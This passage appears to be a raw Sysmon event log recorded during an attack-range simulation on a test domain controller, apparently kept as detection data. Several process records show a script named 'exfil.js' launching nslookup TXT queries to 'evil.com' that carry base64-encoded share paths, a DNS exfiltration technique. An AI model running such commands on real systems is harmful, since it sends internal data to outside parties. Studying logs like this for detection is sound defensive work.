10341000x8000000000000000216595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.439{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.439{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.439{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.440{2E1864BB-1902-629A-B746-000000005F02}7260C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyality.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.424{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrymte.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-1902-629A-B546-000000005F02}64167908C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B646-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B646-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.386{2E1864BB-1902-629A-B446-000000005F02}81087208C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-B646-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.393{2E1864BB-1902-629A-B646-000000005F02}6560C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-B446-000000005F02}8108C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrymte.tmp 2>&1 10341000x8000000000000000216582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.354{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-B546-000000005F02}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.354{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-B546-000000005F02}6416C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.339{2E1864BB-1902-629A-B546-000000005F02}64167908C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B446-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.323{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B546-000000005F02}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.307{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.307{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.307{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B446-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.307{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.307{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.307{2E1864BB-18E0-629A-6742-000000005F02}39761848C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-B446-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.310{2E1864BB-1902-629A-B446-000000005F02}8108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrymte.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.286{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzjfu.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.786{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51401- 354300x8000000000000000216569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.786{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51401- 354300x8000000000000000216568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.786{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51400- 354300x8000000000000000216567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51400- 354300x8000000000000000216566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51399- 354300x8000000000000000216565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51399- 354300x8000000000000000216564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-51398-false127.0.0.1-53domain 354300x8000000000000000216563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51398- 354300x8000000000000000216562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51398- 354300x8000000000000000216561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-51398-false127.0.0.1-53domain 354300x8000000000000000216560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-51397-false127.0.0.1-53domain 354300x8000000000000000216559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51397- 354300x8000000000000000216558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51397- 354300x8000000000000000216557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-51397-false127.0.0.1-53domain 354300x8000000000000000216556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-51396-false127.0.0.1-53domain 354300x8000000000000000216555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51396- 354300x8000000000000000216554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.682{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51396- 354300x8000000000000000216553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.682{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-51396-false127.0.0.1-53domain 354300x8000000000000000216552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.579{00000000-0000-0000-0000-000000000000}7036<unknown 